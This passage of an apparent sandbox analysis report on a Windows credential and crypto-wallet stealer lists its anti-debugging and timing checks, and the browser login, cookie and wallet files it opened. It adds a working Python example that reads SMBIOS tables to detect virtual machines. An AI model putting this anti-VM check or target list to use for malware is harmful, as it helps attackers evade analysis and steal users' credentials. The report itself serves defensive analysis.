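The two stolen-byte counts (5 and 7) are the instruction-boundary lengths the hooking code had to copy out before it could overwrite the first five bytes, which is why the second trampoline resumes at +7 rather than +5. Pairing without the image/non-image split is ambiguous, because each pair reads the same way in both directions.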

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Special instruction interceptor: First address: 000000000187619E instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Special instruction interceptor: First address: 0000000001236577 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe RDTSC instruction interceptor: First address: 000000000189158B second address: 0000000001891596 instructions: 0x00000000 rdtsc 0x00000002 mov esi, dword ptr [esp+28h] 0x00000006 movzx bx, al 0x0000000a dec esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe RDTSC instruction interceptor: First address: 0000000000DF4968 second address: 0000000000DF4973 instructions: 0x00000000 rdtsc 0x00000002 mov esi, dword ptr [esp+28h] 0x00000006 movzx bx, al 0x0000000a dec esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe System information queried: ModuleInformation Jump to behavior
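The two FirmwareTableInformation queries above are NtQuerySystemInformation with the class that GetSystemFirmwareTable wraps; the usual reason a stealer asks for it is to read the raw SMBIOS table and compare its BIOS and system vendor strings against hypervisor names. The report records only the query, not which table the sample read or what it compared. The Python below is an added example, not code from the report or from the sample: it walks the raw SMBIOS layout (a 4-byte header, a formatted area, then a NUL-terminated string set closed by a second NUL) and flags hypervisor markers. The sample table is constructed here to look like a VirtualBox guest, the marker list is an assumption, and the Windows reader at the end calls the real kernel32 GetSystemFirmwareTable with the 'RSMB' provider and only runs when the script is executed on Windows.

```python
"""Parse a raw SMBIOS table and look for hypervisor vendor strings.
Added example; the report only records the firmware-table query."""
from __future__ import annotations
import struct
import sys

# Heuristic marker list (assumption, not from the report)
VM_MARKERS = ("vmware", "virtualbox", "innotek", "qemu", "parallels", "bochs", "kvm", "xen")


def parse_smbios(table: bytes) -> list[dict]:
    """Walk SMBIOS structures: type(1) length(1) handle(2), formatted area,
    then NUL-terminated strings ended by an extra NUL (two NULs if none)."""
    structs = []
    off = 0
    while off + 4 <= len(table):
        stype, slen, handle = struct.unpack_from("<BBH", table, off)
        formatted = table[off + 4:off + slen]
        pos = off + slen
        strings: list[str] = []
        try:
            while True:
                end = table.index(b"\x00", pos)
                if end == pos:                          # empty string closes the set
                    pos = end + (1 if strings else 2)   # no strings at all: double NUL
                    break
                strings.append(table[pos:end].decode("ascii", "replace"))
                pos = end + 1
        except ValueError:                              # truncated blob: stop walking
            break
        structs.append({"type": stype, "handle": handle,
                        "formatted": formatted, "strings": strings})
        if stype == 127:                                # end-of-table structure
            break
        off = pos
    return structs


def vm_vendor_strings(table: bytes) -> list[tuple[int, str]]:
    """(structure type, string) for every string containing a hypervisor marker."""
    hits = []
    for s in parse_smbios(table):
        for text in s["strings"]:
            if any(marker in text.lower() for marker in VM_MARKERS):
                hits.append((s["type"], text))
    return hits


def is_virtual_machine(table: bytes) -> bool:
    return bool(vm_vendor_strings(table))


def _struct(stype: int, handle: int, formatted: bytes, strings: list[str]) -> bytes:
    """Build one SMBIOS structure (used to construct the sample table below)."""
    header = struct.pack("<BBH", stype, 4 + len(formatted), handle)
    if not strings:
        return header + formatted + b"\x00\x00"
    return header + formatted + b"".join(s.encode() + b"\x00" for s in strings) + b"\x00"


# Constructed sample: type 0 (BIOS Information, 18-byte formatted area for
# SMBIOS 2.0) and type 1 (System Information, 27 bytes) as a VirtualBox guest
# would present them, then the type 127 end-of-table marker.
SAMPLE_TABLE = (
    _struct(0, 0x0000, bytes([1, 2]) + struct.pack("<H", 0xE000) + bytes([3, 0xFF]) + bytes(8),
            ["innotek GmbH", "VirtualBox", "12/01/2006"])
    + _struct(1, 0x0001, bytes([1, 2, 3, 4]) + bytes(16) + bytes([6, 0, 0]),
              ["innotek GmbH", "VirtualBox", "1.2", "0"])
    + _struct(127, 0x0002, b"", [])
)


def read_raw_smbios_windows() -> bytes:
    """Read the 'RSMB' table through kernel32.GetSystemFirmwareTable (Windows only)
    and strip the 8-byte RawSMBIOSData header in front of the structures."""
    import ctypes
    k32 = ctypes.windll.kernel32
    RSMB = 0x52534D42
    size = k32.GetSystemFirmwareTable(RSMB, 0, None, 0)
    buf = ctypes.create_string_buffer(size)
    k32.GetSystemFirmwareTable(RSMB, 0, buf, size)
    return buf.raw[8:]


if __name__ == "__main__":
    table = read_raw_smbios_windows() if sys.platform == "win32" else SAMPLE_TABLE
    for stype, text in vm_vendor_strings(table):
        print(f"type {stype}: {text!r}")
    print("hypervisor marker found" if is_virtual_machine(table) else "no hypervisor marker")
```

On the defensive side this is also the check to run against a sandbox image: if the guest's type 0 and type 1 strings carry any of these markers, a sample with this behaviour will see them, and the sandbox's own SMBIOS values are the first thing to change.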

Anti Debugging

Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe System information queried: KernelDebuggerInformation Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.460242946.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.470300145.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.458303380.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.468368220.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446552049.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.466555483.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446585684.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451981881.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446651246.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446518544.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.481057037.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.454619131.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452125462.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446733215.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.455974232.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.469287857.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.460242946.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.470300145.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.458303380.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.468368220.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446552049.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.466555483.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446585684.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451981881.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446651246.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446518544.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.481057037.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.454619131.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452125462.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446733215.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.455974232.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.469287857.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY